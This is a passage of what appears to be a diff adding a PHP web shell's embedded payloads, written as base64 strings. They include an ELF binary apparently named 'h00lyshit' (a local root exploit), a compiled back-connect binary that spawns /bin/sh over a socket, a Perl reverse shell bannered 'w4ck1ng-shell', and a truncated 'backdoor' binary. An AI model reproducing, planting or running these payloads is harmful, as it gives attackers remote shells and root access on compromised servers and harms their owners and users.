+AEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAA
+LnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5
+bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBs
+dAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3Rv
+cnMALmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAAABSBBAgUAQAAEwAAAAAAAAAAAAAAAQAAAAAA
+AAAjAAAABwAAAAIAAAAogQQIKAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAMQAAAAUAAAACAAAASIEE
+CEgBAADAAAAABAAAAAAAAAAEAAAABAAAADcAAAALAAAAAgAAAAiCBAgIAgAA0AEAAAUAAAABAAAA
+BAAAABAAAAA/AAAAAwAAAAIAAADYgwQI2AMAAOQAAAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28C
+AAAAvIQECLwEAAA6AAAABAAAAAAAAAACAAAAAgAAAFQAAAD+//9vAgAAAPiEBAj4BAAAIAAAAAUA
+AAABAAAABAAAAAAAAABjAAAACQAAAAIAAAAYhQQIGAUAABgAAAAEAAAAAAAAAAQAAAAIAAAAbAAA
+AAkAAAACAAAAMIUECDAFAAC4AAAABAAAAAsAAAAEAAAACAAAAHUAAAABAAAABgAAAOiFBAjoBQAA
+FwAAAAAAAAAAAAAABAAAAAAAAABwAAAAAQAAAAYAAAAAhgQIAAYAAIABAAAAAAAAAAAAAAQAAAAE
+AAAAewAAAAEAAAAGAAAAgIcECIAHAABIBgAAAAAAAAAAAAAEAAAAAAAAAIEAAAABAAAABgAAAMiN
+BAjIDQAAGwAAAAAAAAAAAAAABAAAAAAAAACHAAAAAQAAAAIAAADkjQQI5A0AAIoAAAAAAAAAAAAA
+AAQAAAAAAAAAjwAAAAEAAAADAAAAAJAECAAQAAAMAAAAAAAAAAAAAAAEAAAAAAAAAJUAAAABAAAA
+AgAAAAyQBAgMEAAABAAAAAAAAAAAAAAABAAAAAAAAACfAAAABgAAAAMAAAAQkAQIEBAAAMgAAAAF
+AAAAAAAAAAQAAAAIAAAAqAAAAAEAAAADAAAA2JAECNgQAAAIAAAAAAAAAAAAAAAEAAAAAAAAAK8A
+AAABAAAAAwAAAOCQBAjgEAAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAAAQAAAAMAAADokAQI6BAA
+AAQAAAAAAAAAAAAAAAQAAAAAAAAAuwAAAAEAAAADAAAA7JAECOwQAABsAAAAAAAAAAAAAAAEAAAA
+BAAAAMAAAAAIAAAAAwAAAGCRBAhgEQAAZAcAAAAAAAAAAAAAIAAAAAAAAADFAAAAAQAAAAAAAAAA
+AAAAYBEAAKgAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAgSAADOAAAAAAAAAAAA
+AAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAQFwAAoAYAABoAAAAzAAAABAAAABAAAAAJAAAAAwAA
+AAAAAAAAAAAAsB0AABwEAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQI
+AAAAAAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAAAIggQIAAAAAAMABAAA
+AAAA2IMECAAAAAADAAUAAAAAALyEBAgAAAAAAwAGAAAAAAD4hAQIAAAAAAMABwAAAAAAGIUECAAA
+AAADAAgAAAAAADCFBAgAAAAAAwAJAAAAAADohQQIAAAAAAMACgAAAAAAAIYECAAAAAADAAsAAAAA
+AICHBAgAAAAAAwAMAAAAAADIjQQIAAAAAAMADQAAAAAA5I0ECAAAAAADAA4AAAAAAACQBAgAAAAA
+AwAPAAAAAAAMkAQIAAAAAAMAEAAAAAAAEJAECAAAAAADABEAAAAAANiQBAgAAAAAAwASAAAAAADg
+kAQIAAAAAAMAEwAAAAAA6JAECAAAAAADABQAAAAAAOyQBAgAAAAAAwAVAAAAAABgkQQIAAAAAAMA
+FgAAAAAAAAAAAAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAA
+AAAAAAADABoAAQAAAKSHBAgAAAAAAgAMABEAAAAAAAAAAAAAAAQA8f8cAAAA2JAECAAAAAABABIA
+KgAAAOCQBAgAAAAAAQATADgAAADokAQIAAAAAAEAFABFAAAACJAECAAAAAABAA8ASQAAAGiRBAgB
+AAAAAQAWAFUAAADIhwQIAAAAAAIADABrAAAABIgECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/3cA
+AADckAQIAAAAAAEAEgCEAAAA5JAECAAAAAABABMAkQAAAAyQBAgAAAAAAQAQAJ8AAADokAQIAAAA
+AAEAFACrAAAApI0ECAAAAAACAAwAwQAAAAAAAAAAAAAABADx/80AAAByiAQIAAAAAAAADADRAAAA
+YogECAAAAAAAAAwA1QAAAMCYBAgEAAAAAQAWANcAAADAlwQIAAEAAAEAFgDZAAAAoJEECAAEAAAB
+ABYA2wAAAKCVBAgQAAAAAQAWAN0AAACAkQQIIAAAAAEAFgDgAAAAwJUECAACAAABABYA4gAAAAAA
+AAAIAAAAEgAAAPQAAAAQkAQIAAAAABEAEQD9AAAAAAAAAEYAAAASAAAADwEAAOSNBAgEAAAAEQAO
+ABYBAAAAAAAAyQEAABIAAAAoAQAAAAAAAFAAAAASAAAAOAEAAAAAAAC+AAAAEgAAAEoBAAAAkAQI
+AAAAABAC8f9bAQAABJAECAAAAAARAg8AaAEAAAAAAAA2AAAAEgAAAHgBAAA8jQQIRAAAABIADACI
+AQAAAAAAAFcAAAASAAAAmgEAAAAAAAA6AAAAEgAAAKsBAADohQQIAAAAABIACgCxAQAAAAAAAEgA
+AAASAAAAwgEAAAAAAAAuAAAAEgAAANkBAACAjQQIIgAAACICDADfAQAAYJEECAQAAAARABYA8QEA
+AGSRBAgEAAAAEQAWAAMCAAAAAAAAfAAAABIAAAAWAgAAgIcECAAAAAASAAwAHQIAAAAAAAAhAQAA
+EgAAADECAAAAAAAAeQAAABIAAABBAgAAAJAECAAAAAAQAvH/VAIAAPSMBAhIAAAAEgAMAGQCAABY
+kQQIAAAAABAA8f9wAgAAtYoECD0CAAASAAwAdQIAAAAAAADVAAAAEgAAAJICAAAAkAQIAAAAABAC
+8f+jAgAAAAAAACcAAAASAAAAtQIAAACQBAgAAAAAIAAPAMACAAAAAAAAKQAAABIAAADSAgAAyI0E
+CAAAAAASAA0A2AIAAAAAAAA3AAAAEgAAAOoCAAB7iAQILwAAABIADADwAgAAAJAECAAAAAAQAvH/
+BAMAADCIBAgAAAAAEAAMAA0DAAAAAAAAfAAAABIAAAAdAwAAAAAAAMsAAAASAAAALQMAAFiRBAgA
+AAAAEADx/zQDAADskAQIAAAAABEAFQBKAwAAxJgECAAAAAAQAPH/TwMAAAAAAADJAAAAEgAAAGED
+AAAAAAAAQwAAABIAAABzAwAAeogECAAAAAAQAAwAfgMAAACQBAgAAAAAEALx/5EDAACAjQQIIgAA
+ABICDACZAwAA6I0ECAQAAAARAA4AqAMAAAAAAAA8AAAAEgAAALsDAAAAAAAAJAAAABIAAADOAwAA
+AJAECAAAAAAQAA8A2wMAAAAAAAAAAAAAIAAAAO8DAACqiAQICwIAABIADAD3AwAAAJAECAAAAAAQ
+AvH/DQQAAAAAAAAAAAAAIAAAAABjYWxsX2dtb25fc3RhcnQAY3J0c3R1ZmYuYwBfX0NUT1JfTElT
+VF9fAF9fRFRPUl9MSVNUX18AX19KQ1JfTElTVF9fAHAuMABjb21wbGV0ZWQuMQBfX2RvX2dsb2Jh
+bF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRFRPUl9FTkRfXwBfX0ZSQU1F
+X0VORF9fAF9fSkNSX0VORF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABoMDBseXNoaXQuYwBjbWQA
+YXJnAGMAdABlAGEAZXgAYgBnZXRwaWRAQEdMSUJDXzIuMABfRFlOQU1JQwBzdHJkdXBAQEdMSUJD
+XzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAGZmbHVzaEBAR0xJ
+QkNfMi4wAF9fZmluaV9hcnJheV9lbmQAX19kc29faGFuZGxlAG1tYXBAQEdMSUJDXzIuMABfX2xp
+YmNfY3N1X2ZpbmkAZXhlY3ZlQEBHTElCQ18yLjAAY2htb2RAQEdMSUJDXzIuMABfaW5pdABwcmN0
+bEBAR0xJQkNfMi4wAHNjaGVkX3lpZWxkQEBHTElCQ18yLjAAZnN0YXQAc3Rkb3V0QEBHTElCQ18y
+LjAAc3RkZXJyQEBHTElCQ18yLjAAd2FpdHBpZEBAR0xJQkNfMi4wAF9zdGFydABfX2Z4c3RhdEBA
+R0xJQkNfMi4wAG5pY2VAQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9p
+bml0AF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRf
+YXJyYXlfZW5kAHN0cmNhdEBAR0xJQkNfMi4wAGRhdGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAA
+X2ZpbmkAbWVtY3B5QEBHTElCQ18yLjAAZXJyb3IAX19wcmVpbml0X2FycmF5X2VuZABfX2V4Y29k
+ZQBvcGVuQEBHTElCQ18yLjAAZXhpdEBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9U
+QUJMRV8AX2VuZABnZXRjd2RAQEdMSUJDXzIuMABtZW1zZXRAQEdMSUJDXzIuMABfX2V4Y29kZV9l
+AF9faW5pdF9hcnJheV9zdGFydABfX2ZzdGF0AF9JT19zdGRpbl91c2VkAG1hZHZpc2VAQEdMSUJD
+XzIuMABzcHJpbnRmQEBHTElCQ18yLjAAX19kYXRhX3N0YXJ0AF9Kdl9SZWdpc3RlckNsYXNzZXMA
+ZXhwbG9pdABfX3ByZWluaXRfYXJyYXlfc3RhcnQAX19nbW9uX3N0YXJ0X18A";
+
+
+$back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAA